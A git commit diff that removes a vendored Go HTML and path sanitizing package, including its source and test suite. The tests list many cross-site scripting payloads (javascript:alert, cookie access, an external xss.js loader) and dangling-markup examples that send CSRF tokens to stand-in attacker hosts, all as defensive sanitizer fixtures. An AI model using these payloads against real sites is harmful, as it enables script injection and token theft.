Remove sanitize package

This commit is contained in:
Remco 2017-03-28 17:15:26 +02:00
parent 2f35235865
commit 5ccf97b353
6 changed files with 0 additions and 728 deletions

View file

@ -1,22 +0,0 @@
# Compiled Object files, Static and Dynamic libs (Shared Objects)
*.o
*.a
*.so
# Folders
_obj
_test
# Architecture specific extensions/prefixes
*.[568vq]
[568vq].out
*.cgo1.go
*.cgo2.c
_cgo_defun.c
_cgo_gotypes.go
_cgo_export.*
_testmain.go
*.exe

View file

@ -1 +0,0 @@
language: go

View file

@ -1,27 +0,0 @@
Copyright (c) 2017 Mechanism Design. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
* Neither the name of Google Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

View file

@ -1,62 +0,0 @@
sanitize [![GoDoc](https://godoc.org/github.com/kennygrant/sanitize?status.svg)](https://godoc.org/github.com/kennygrant/sanitize) [![Go Report Card](https://goreportcard.com/badge/github.com/kennygrant/sanitize)](https://goreportcard.com/report/github.com/kennygrant/sanitize) [![CircleCI](https://circleci.com/gh/kennygrant/sanitize.svg?style=svg)](https://circleci.com/gh/kennygrant/sanitize)
========
Package sanitize provides functions to sanitize html and paths with go (golang).
FUNCTIONS
```go
sanitize.Accents(s string) string
```
Accents replaces a set of accented characters with ascii equivalents.
```go
sanitize.BaseName(s string) string
```
BaseName makes a string safe to use in a file name, producing a sanitized basename replacing . or / with -. Unlike Name no attempt is made to normalise text as a path.
```go
sanitize.HTML(s string) string
```
HTML strips html tags with a very simple parser, replaces common entities, and escapes < and > in the result. The result is intended to be used as plain text.
```go
sanitize.HTMLAllowing(s string, args...[]string) (string, error)
```
HTMLAllowing parses html and allows certain tags and attributes from the lists optionally specified by args - args[0] is a list of allowed tags, args[1] is a list of allowed attributes. If either is missing default sets are used.
```go
sanitize.Name(s string) string
```
Name makes a string safe to use in a file name by first finding the path basename, then replacing non-ascii characters.
```go
sanitize.Path(s string) string
```
Path makes a string safe to use as an url path.
Changes
-------
Version 1.2
Adjusted HTML function to avoid linter warning
Added more tests from https://githubengineering.com/githubs-post-csp-journey/
Changed name of license file
Added badges and change log to readme
Version 1.1
Fixed typo in comments.
Merge pull request from Povilas Balzaravicius Pawka
- replace br tags with newline even when they contain a space
Version 1.0
First release

View file

@ -1,383 +0,0 @@
// Package sanitize provides functions for sanitizing text.
package sanitize
import (
"bytes"
"html"
"html/template"
"io"
"path"
"regexp"
"strings"
parser "golang.org/x/net/html"
)
// Tag and attribute lists consulted by HTMLAllowing.
var (
// ignoreTags lists the elements HTMLAllowing drops together with their contents when they are not in the allowed tags.
ignoreTags = []string{"title", "script", "style", "iframe", "frame", "frameset", "noframes", "noembed", "embed", "applet", "object", "base"}
// defaultTags is the list of allowed tags HTMLAllowing uses when the caller passes no list of its own.
defaultTags = []string{"h1", "h2", "h3", "h4", "h5", "h6", "div", "span", "hr", "p", "br", "b", "i", "strong", "em", "ol", "ul", "li", "a", "img", "pre", "code", "blockquote"}
// defaultAttributes is the list of allowed attributes HTMLAllowing uses when the caller passes fewer than two lists.
defaultAttributes = []string{"id", "class", "src", "href", "title", "alt", "name", "rel"}
)
// HTMLAllowing sanitizes the html in s, letting through only allowed tags and attributes.
// args[0], when present, replaces the default list of allowed tags; args[1], when present,
// replaces the default list of allowed attributes.
// A disallowed tag named in ignoreTags is dropped together with everything up to its end tag;
// other disallowed tags are dropped but their text is kept. Comments and doctypes are always removed.
// If the tokenizer fails with anything other than io.EOF, the error is returned with an empty string.
func HTMLAllowing(s string, args ...[]string) (string, error) {
	tags, attrs := defaultTags, defaultAttributes
	if len(args) > 0 {
		tags = args[0]
	}
	if len(args) > 1 {
		attrs = args[1]
	}

	var out bytes.Buffer
	// skipping is the name of the ignored element we are currently inside, or "" when not skipping.
	skipping := ""
	// permitted reports whether a tag may be written: it must be allowed and we must not be skipping.
	permitted := func(name string) bool {
		return len(skipping) == 0 && includes(tags, name)
	}

	z := parser.NewTokenizer(strings.NewReader(s))
	for {
		kind := z.Next()
		tok := z.Token()

		switch kind {
		case parser.ErrorToken:
			// io.EOF is the normal end of input; any other error aborts the whole call.
			if err := z.Err(); err != io.EOF {
				return "", err
			}
			return out.String(), nil

		case parser.StartTagToken:
			switch {
			case permitted(tok.Data):
				tok.Attr = cleanAttributes(tok.Attr, attrs)
				out.WriteString(tok.String())
			case includes(ignoreTags, tok.Data):
				// Start skipping until this element is closed.
				skipping = tok.Data
			}

		case parser.SelfClosingTagToken:
			switch {
			case permitted(tok.Data):
				tok.Attr = cleanAttributes(tok.Attr, attrs)
				out.WriteString(tok.String())
			case tok.Data == skipping:
				skipping = ""
			}

		case parser.EndTagToken:
			switch {
			case permitted(tok.Data):
				// End tags are written without any attributes.
				tok.Attr = []parser.Attribute{}
				out.WriteString(tok.String())
			case tok.Data == skipping:
				skipping = ""
			}

		case parser.TextToken:
			// Text passes through unless it sits inside an ignored element.
			if skipping == "" {
				out.WriteString(tok.String())
			}
		}
		// Comments, doctypes and unknown token types fall through the switch and are dropped.
	}
}
// HTML strips html tags from s with a simple character scanner, turns common entities into
// plain characters, and escapes whatever markup characters remain. The result is meant to be
// used as plain text.
// Note the returned text may still contain entities, because it is passed through
// HTMLEscapeString and only a few of the resulting entities are translated back.
func HTML(s string) (output string) {
	output = s

	// Only strings containing an angle bracket need the tag-stripping pass.
	if strings.ContainsAny(s, "<>") {
		// Newlines have no meaning outside tags (except in pre), so drop them first;
		// pre sections lose their formatting but we get fewer unintentional paragraphs.
		s = strings.Replace(s, "\n", "", -1)

		// Paragraph ends and line breaks become real newlines, to preserve that formatting.
		for _, brk := range []string{"</p>", "<br>", "</br>", "<br/>", "<br />"} {
			s = strings.Replace(s, brk, "\n", -1)
		}

		// Keep only the runes that lie outside a < ... > pair.
		var text bytes.Buffer
		skip := false
		for _, r := range s {
			if r == '<' {
				skip = true
				continue
			}
			if r == '>' {
				skip = false
				continue
			}
			if !skip {
				text.WriteRune(r)
			}
		}
		output = text.String()
	}

	// Replace a few common harmless entities, to arrive at something more like plain text.
	harmless := [][2]string{
		{"&#8216;", "'"},
		{"&#8217;", "'"},
		{"&#8220;", "\""},
		{"&#8221;", "\""},
		{"&nbsp;", " "},
		{"&quot;", "\""},
		{"&apos;", "'"},
	}
	for _, pair := range harmless {
		output = strings.Replace(output, pair[0], pair[1], -1)
	}

	// Translate remaining entities (for example accents) into their plain text equivalent,
	// then escape the text in case any markup characters are left.
	output = html.UnescapeString(output)
	output = template.HTMLEscapeString(output)

	// Undo the escaping of quotes, and of ampersands that are followed by a space.
	restored := [][2]string{
		{"&#34;", "\""},
		{"&#39;", "'"},
		{"&amp; ", "& "},
		{"&amp;amp; ", "& "},
	}
	for _, pair := range restored {
		output = strings.Replace(output, pair[0], pair[1], -1)
	}

	return output
}
// illegalPath matches every character that is not allowed in a sanitized url path.
// The set is deliberately narrow because the result is intended for ascii url slugs.
var illegalPath = regexp.MustCompile(`[^[:alnum:]\~\-\./]`)

// Path makes a string safe to use as an url path.
// The input is lowercased, stripped of ".." sequences and normalised with path.Clean, and is
// then passed through cleanString, which flattens accents, turns common separators into -
// and removes everything illegalPath matches.
// NB the result may be of length 0, the caller must check.
func Path(s string) string {
	lowered := strings.ToLower(s)
	withoutDots := strings.Replace(lowered, "..", "", -1)
	return cleanString(path.Clean(withoutDots), illegalPath)
}
// illegalName matches every character that is not allowed in a sanitized file name,
// i.e. everything apart from alphanumerics, - and .
var illegalName = regexp.MustCompile(`[^[:alnum:]-.]`)

// Name makes a string safe to use in a file name.
// It lowercases the input, keeps only the path basename, and passes that through cleanString,
// which flattens accents, turns common separators into - and removes everything illegalName matches.
// NB the result may be of length 0, the caller must check.
func Name(s string) string {
	base := path.Base(strings.ToLower(s))
	return cleanString(path.Clean(base), illegalName)
}
// baseNameSeparators matches the characters (. and /) that BaseName turns into -.
var baseNameSeparators = regexp.MustCompile(`[./]`)

// BaseName makes a string safe to use in a file name, producing a sanitized basename in which
// . and / are replaced with -. The result is then passed through cleanString with illegalName.
// Unlike Name, no attempt is made to normalise a path or to normalise case.
// NB the result may be of length 0, the caller must check.
func BaseName(s string) string {
	dashed := baseNameSeparators.ReplaceAllString(s, "-")
	return cleanString(dashed, illegalName)
}
// transliterations maps accented and other non-ascii runes to the ascii strings that Accents substitutes for them.
// It is a very limited list, meant to catch common european names translated to urls.
// This set could be expanded with at least caps and many more characters.
var transliterations = map[rune]string{
'À': "A",
'Á': "A",
'Â': "A",
'Ã': "A",
'Ä': "A",
'Å': "AA",
'Æ': "AE",
'Ç': "C",
'È': "E",
'É': "E",
'Ê': "E",
'Ë': "E",
'Ì': "I",
'Í': "I",
'Î': "I",
'Ï': "I",
'Ð': "D",
'Ł': "L",
'Ñ': "N",
'Ò': "O",
'Ó': "O",
'Ô': "O",
'Õ': "O",
'Ö': "O",
'Ø': "OE",
'Ù': "U",
'Ú': "U",
'Ü': "U",
'Û': "U",
'Ý': "Y",
'Þ': "Th",
'ß': "ss",
'à': "a",
'á': "a",
'â': "a",
'ã': "a",
'ä': "a",
'å': "aa",
'æ': "ae",
'ç': "c",
'è': "e",
'é': "e",
'ê': "e",
'ë': "e",
'ì': "i",
'í': "i",
'î': "i",
'ï': "i",
'ð': "d",
'ł': "l",
'ñ': "n",
'ń': "n",
'ò': "o",
'ó': "o",
'ô': "o",
'õ': "o",
'ō': "o",
'ö': "o",
'ø': "oe",
'ś': "s",
'ù': "u",
'ú': "u",
'û': "u",
'ū': "u",
'ü': "u",
'ý': "y",
'þ': "th",
'ÿ': "y",
'ż': "z",
'Œ': "OE",
'œ': "oe",
}
// Accents replaces a set of accented characters with ascii equivalents.
// Every rune of s that has an entry in transliterations is replaced by that entry;
// all other runes are copied unchanged.
func Accents(s string) string {
	var out bytes.Buffer
	for _, r := range s {
		ascii, known := transliterations[r]
		if !known {
			out.WriteRune(r)
			continue
		}
		out.WriteString(ascii)
	}
	return out.String()
}
// Patterns cleanAttributes uses to vet attribute values. Both are applied to the lowercased value.
var (
	// illegalAttr matches a value that contains data: or javascript: anywhere.
	// We don't allow this in attributes as it is so frequently used for xss.
	// NB whitespace is tolerated between the letters and before the colon.
	illegalAttr = regexp.MustCompile(`(d\s*a\s*t\s*a|j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*)\s*:`)

	// legalHrefAttr matches the only href values we let through: values that start with / or #,
	// and values that start (after optional whitespace) with mailto://, http:// or https://.
	// The whole alternation is anchored with \A. Without the group the anchor applies to the
	// first alternative only, and a value such as "vbscript:x//http://" is accepted merely
	// because it contains an allowed scheme somewhere.
	// NOTE(review): the trailing ? makes [^/\\] optional, so "//host" is still accepted through
	// the first alternative - confirm whether protocol-relative urls are meant to be allowed.
	legalHrefAttr = regexp.MustCompile(`\A(?:[/#][^/\\]?|\s*(?:mailto://|http://|https://))`)
)
// cleanAttributes returns the attributes of a that are safe to keep.
// An attribute is kept only when its key is in allowed, its lowercased value does not match
// illegalAttr, its value is not empty, and - for href - its lowercased value matches legalHrefAttr.
// An empty input slice is returned as is; otherwise the result is nil when nothing is kept.
func cleanAttributes(a []parser.Attribute, allowed []string) []parser.Attribute {
	if len(a) == 0 {
		return a
	}

	var kept []parser.Attribute
	for _, attr := range a {
		if !includes(allowed, attr.Key) {
			continue
		}

		lowered := strings.ToLower(attr.Val)
		// Values carrying data: or javascript: are rejected for every attribute.
		dangerous := illegalAttr.FindString(lowered) != ""
		// href values must additionally look like / # mailto:// http:// or https://.
		badHref := attr.Key == "href" && legalHrefAttr.FindString(lowered) == ""

		if dangerous || badHref || attr.Val == "" {
			continue
		}
		kept = append(kept, attr)
	}
	return kept
}
// Patterns cleanString uses to normalise separators in normal strings.
var (
// separators matches the characters (space & _ = + :) that cleanString replaces with our canonical separator - rather than removing.
separators = regexp.MustCompile(`[ &_=+:]`)
// dashes matches a run of one or more dashes, which cleanString collapses into a single dash.
dashes = regexp.MustCompile(`[\-]+`)
)
// cleanString replaces separators with - and removes every character matched by r from s.
// The steps, in order: spaces are trimmed from both ends (so the result does not start or end
// on a - produced by a space), accents are flattened with Accents so that the name stays
// legible once non-ascii characters are removed, separators become -, characters matched by r
// are deleted, and runs of dashes left by the earlier steps are collapsed into one.
func cleanString(s string, r *regexp.Regexp) string {
	trimmed := strings.Trim(s, " ")
	flattened := Accents(trimmed)
	dashed := separators.ReplaceAllString(flattened, "-")
	stripped := r.ReplaceAllString(dashed, "")
	return dashes.ReplaceAllString(stripped, "-")
}
// includes reports whether s is an element of a. The comparison is exact and case sensitive.
func includes(a []string, s string) bool {
	for i := 0; i < len(a); i++ {
		if a[i] == s {
			return true
		}
	}
	return false
}

View file

@ -1,233 +0,0 @@
// Utility functions for working with text
package sanitize
import (
"testing"
)
// Format is the failure message layout shared by the tests in this file: the input, the expected output and the actual output, each printed with %q.
var Format = "\ninput: %q\nexpected: %q\noutput: %q"
// Test pairs an input string with the output a sanitizing function is expected to produce for it.
type Test struct {
input string
expected string
}
// urls holds the inputs and expected outputs for Path (see TestPath and BenchmarkPath).
// NB the treatment of accents - they are removed and replaced with ascii transliterations
var urls = []Test{
{"ReAd ME.md", `read-me.md`},
{"E88E08A7-279C-4CC1-8B90-86DE0D7044_3C.html", `e88e08a7-279c-4cc1-8b90-86de0d7044-3c.html`},
{"/user/test/I am a long url's_-?ASDF@£$%£%^testé.html", `/user/test/i-am-a-long-urls-asdfteste.html`},
{"/../../4-icon.jpg", `/4-icon.jpg`},
{"/Images_dir/../4-icon.jpg", `/images-dir/4-icon.jpg`},
{"../4 icon.*", `/4-icon.`},
{"Spac ey/Nôm/test før url", `spac-ey/nom/test-foer-url`},
{"../*", `/`},
}
// TestPath checks Path against every entry in urls and aborts at the first mismatch.
func TestPath(t *testing.T) {
	for i := range urls {
		want := urls[i].expected
		if got := Path(urls[i].input); got != want {
			t.Fatalf(Format, urls[i].input, want, got)
		}
	}
}
// BenchmarkPath runs Path over every entry in urls b.N times, aborting if an output is wrong.
func BenchmarkPath(b *testing.B) {
	for run := 0; run < b.N; run++ {
		for _, tc := range urls {
			got := Path(tc.input)
			if got == tc.expected {
				continue
			}
			b.Fatalf(Format, tc.input, tc.expected, got)
		}
	}
}
// fileNames holds the inputs and expected outputs for Name (see TestName and BenchmarkName).
// Directories are dropped and only the sanitized, lowercased final path element is expected.
var fileNames = []Test{
{"ReAd ME.md", `read-me.md`},
{"/var/etc/jobs/go/go/src/pkg/foo/bar.go", `bar.go`},
{"I am a long url's_-?ASDF@£$%£%^é.html", `i-am-a-long-urls-asdfe.html`},
{"/../../4-icon.jpg", `4-icon.jpg`},
{"/Images/../4-icon.jpg", `4-icon.jpg`},
{"../4 icon.jpg", `4-icon.jpg`},
{"../4 icon-testé *8%^\"'\".jpg ", `4-icon-teste-8.jpg`},
}
// TestName checks Name against every entry in fileNames and aborts at the first mismatch.
func TestName(t *testing.T) {
	for _, tc := range fileNames {
		got := Name(tc.input)
		if got == tc.expected {
			continue
		}
		t.Fatalf(Format, tc.input, tc.expected, got)
	}
}
// BenchmarkName runs Name over every entry in fileNames b.N times, aborting if an output is wrong.
func BenchmarkName(b *testing.B) {
	for run := 0; run < b.N; run++ {
		for idx := range fileNames {
			want := fileNames[idx].expected
			if got := Name(fileNames[idx].input); got != want {
				b.Fatalf(Format, fileNames[idx].input, want, got)
			}
		}
	}
}
// baseFileNames holds the inputs and expected outputs for BaseName (see TestBaseName).
// Case is preserved in the expected output, and . and / are expected to become -.
var baseFileNames = []Test{
{"The power & the Glory jpg file. The end", `The-power-the-Glory-jpg-file-The-end`},
{"/../../4-iCoN.jpg", `-4-iCoN-jpg`},
{"And/Or", `And-Or`},
{"Sonic.EXE", `Sonic-EXE`},
{"012: #Fetch for Defaults", `012-Fetch-for-Defaults`},
}
// TestBaseName checks BaseName against every entry in baseFileNames and aborts at the first mismatch.
func TestBaseName(t *testing.T) {
	for i := 0; i < len(baseFileNames); i++ {
		tc := baseFileNames[i]
		if got := BaseName(tc.input); got != tc.expected {
			t.Fatalf(Format, tc.input, tc.expected, got)
		}
	}
}
// htmlTests holds the inputs and expected outputs for HTML (see TestHTML), using malformed or malicious html.
// NB because HTML removes everything after a < until the next >
// and does not attempt to parse, we should be safe from invalid html,
// but will sometimes completely empty the string if we have invalid input.
// Note some cases are written with " rather than ` so that escapes such as \n can be used on one line.
var htmlTests = []Test{
{`&nbsp;`, " "},
{`&amp;#x000D;`, `&amp;#x000D;`},
{`<invalid attr="invalid"<,<p><p><p><p><p>`, ``},
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "Bold Not bold\nAlso not bold."},
{`FOO&#x000D;ZOO`, "FOO\rZOO"},
{`<script><!--<script </s`, ``},
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `test`},
{`<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>`, ` or ***************aaaaaaaaaaaaaaaaaaaaaaaaaa`},
{`<p>Some text</p><frameset src="testing.html"></frameset>`, "Some text\n"},
{`Something<br/>Some more`, "Something\nSome more"},
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.<//data>><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">">><><img src="">`, "This is a 'test' of bold & italic \n invalid markup.. \""},
{`<![CDATA[<sender>John Smith</sender>]]>`, `John Smith]]`},
{`<!-- <script src='blah.js' data-rel='fsd'> --> This is text`, ` -- This is text`},
{`<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>`, `body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}`},
{`&lt;iframe src="" attr=""&gt;>>>>>`, `&lt;iframe src="" attr=""&gt;`},
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `alert("XSS")"`},
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
{`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
{`<IMG SRC="javascript:alert('XSS')" <test`, ``},
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, ``},
{`&gt & test &lt`, `&gt; & test &lt;`},
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
{`&#8220;hello&#8221; it&#8217;s for &#8216;real&#8217;`, `"hello" it's for 'real'`},
{`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, ``},
{`'';!--"<XSS>=&{()}`, `'';!--"=&amp;{()}`},
{"LINE 1<br />\nLINE 2", "LINE 1\nLINE 2"},
// Examples from https://githubengineering.com/githubs-post-csp-journey/
{`<img src='https://example.com/log_csrf?html=`, ``},
{`<img src='https://example.com/log_csrf?html=
<form action="https://example.com/account/public_keys/19023812091023">
...
<input type="hidden" name="csrf_token" value="some_csrf_token_value">
</form>`, `...`},
{`<img src='https://example.com?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f
<p>secret</p>`, `secret
`},
{`<form action="https://some-evil-site.com"><button>Click</button><textarea name='
<!-- </textarea> --><!-- '" -->
<form action="/logout">
<input name="authenticity_token" type="hidden" value="secret1">
</form>`, `Click -- `},
}
// TestHTML checks HTML against every entry in htmlTests and aborts at the first mismatch.
func TestHTML(t *testing.T) {
	for i := range htmlTests {
		in, want := htmlTests[i].input, htmlTests[i].expected
		got := HTML(in)
		if got == want {
			continue
		}
		t.Fatalf(Format, in, want, got)
	}
}
// htmlTestsAllowing holds the inputs and expected outputs for HTMLAllowing when it is called
// without extra arguments, i.e. with the default allowed tags and attributes
// (see TestHTMLAllowed and BenchmarkHTMLAllowed).
var htmlTestsAllowing = []Test{
{`<IMG SRC="jav&#x0D;ascript:alert('XSS');">`, `<img>`},
{`<i>hello world</i href="javascript:alert('hello world')">`, `<i>hello world</i>`},
{`hello<br ><br / ><hr /><hr >rulers`, `hello<br><br><hr/><hr>rulers`},
{`<span class="testing" id="testid" name="testname" style="font-color:red;text-size:gigantic;"><p>Span</p></span>`, `<span class="testing" id="testid" name="testname"><p>Span</p></span>`},
{`<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`, `<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`},
{`<p>Some text</p><exotic><iframe>test</iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
{`<b>hello world</b>`, `<b>hello world</b>`},
{`text<p>inside<p onclick='alert()'/>too`, `text<p>inside<p/>too`},
{`&amp;#x000D;`, `&amp;#x000D;`},
{`<invalid attr="invalid"<,<p><p><p><p><p>`, `<p><p><p><p>`},
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "<b><p>Bold </b> Not bold</p>\nAlso not bold."},
{"`FOO&#x000D;ZOO", "`FOO&#13;ZOO"},
{`<script><!--<script </s`, ``},
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `<a href="/" alt="Fab.com | Aqua Paper Map 22" title="Fab.com | Aqua Paper Map 22">test</a>`},
{"<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>", "?&gt; or <p id=\"0&lt;/p\"> or &lt;&lt;&gt;&lt;@$!@£M&lt;&lt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;&gt;***************aaaaaaaaaaaaaaaaaaaaaaaaaa&gt;"},
{`<p>Some text</p><exotic><iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
{"Something<br/>Some more", `Something<br/>Some more`},
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.</data><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">escape;inside script tag"><img src="">`, `<a href="http://www.example.com">This is a &#39;test&#39; of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.`},
{"<sender ignore=me>John Smith</sender>", `John Smith`},
{"<!-- <script src='blah.js' data-rel='fsd'> --> This is text", ` This is text`},
{"<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>", ``},
{`&lt;iframe src="" attr=""&gt;`, `&lt;iframe src=&#34;&#34; attr=&#34;&#34;&gt;`},
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img>`},
{`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
{`<IMG SRC="javascript:alert('XSS')">>> <test`, `<img>&gt;&gt; `},
{`&gt & test &lt`, `&gt; &amp; test &lt;`},
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img></img>`},
{`<img src="data:text/javascript;alert('alert');">`, `<img>`},
{`<iframe src=http://... <`, ``},
{`<iframe src="data:CSS"><img><a><</a>;sdf<iframe>`, ``},
{`<img src=javascript:alert(document.cookie)>`, `<img>`},
{`<?php echo('hello world')>`, ``},
{`Hello <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>World`, `Hello <a class="XSS"></a>World`},
{`<a href="javascript:alert('XSS1')" onmouseover="alert('XSS2')">XSS<a>`, `<a>XSS<a>`},
{`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`,
`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`},
{`<a href="javascript:alert(&#39;XSS1&#39;)" "document.write('<HTML> Tags and markup');">XSS<a>`, `<a> Tags and markup&#39;);&#34;&gt;XSS<a>`},
{`<a <script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/> >`, `<a>document.write(&#34;UNTRUSTED INPUT: &#34; + document.location.hash); &gt;`},
{`<a href="#anchor">foo</a>`, `<a href="#anchor">foo</a>`},
{`<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>`, `<img>`},
{`<IMG SRC="jav ascript:alert('XSS');">`, `<img>`},
{`<IMG SRC="jav&#x09;ascript:alert('XSS');">`, `<img>`},
{`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, ` +ADw-SCRIPT+AD4-alert(&#39;XSS&#39;);+ADw-/SCRIPT+AD4-`},
{`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, `PT SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;`},
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, `<a></a>`},
{`'';!--"<XSS>=&{()}`, `&#39;&#39;;!--&#34;=&amp;{()}`},
{`<IMG SRC=javascript:alert('XSS')`, ``},
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
{`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, `<img>`},
}
// TestHTMLAllowed checks HTMLAllowing, called with its default tag and attribute lists,
// against every entry in htmlTestsAllowing. It aborts at the first error or mismatch.
func TestHTMLAllowed(t *testing.T) {
	for _, test := range htmlTestsAllowing {
		output, err := HTMLAllowing(test.input)
		if err != nil {
			// Format has only three verbs, so the error gets a verb of its own here;
			// passed as a fourth argument to Format it would be printed as %!(EXTRA ...).
			t.Fatalf(Format+"\nerror: %v", test.input, test.expected, output, err)
		}
		if output != test.expected {
			t.Fatalf(Format, test.input, test.expected, output)
		}
	}
}
// BenchmarkHTMLAllowed runs HTMLAllowing, with its default tag and attribute lists, over every
// entry in htmlTestsAllowing b.N times, aborting if a call fails or produces the wrong output.
func BenchmarkHTMLAllowed(b *testing.B) {
	for i := 0; i < b.N; i++ {
		for _, test := range htmlTestsAllowing {
			output, err := HTMLAllowing(test.input)
			if err != nil {
				// Format has only three verbs, so the error gets a verb of its own here;
				// passed as a fourth argument to Format it would be printed as %!(EXTRA ...).
				b.Fatalf(Format+"\nerror: %v", test.input, test.expected, output, err)
			}
			if output != test.expected {
				b.Fatalf(Format, test.input, test.expected, output)
			}
		}
	}
}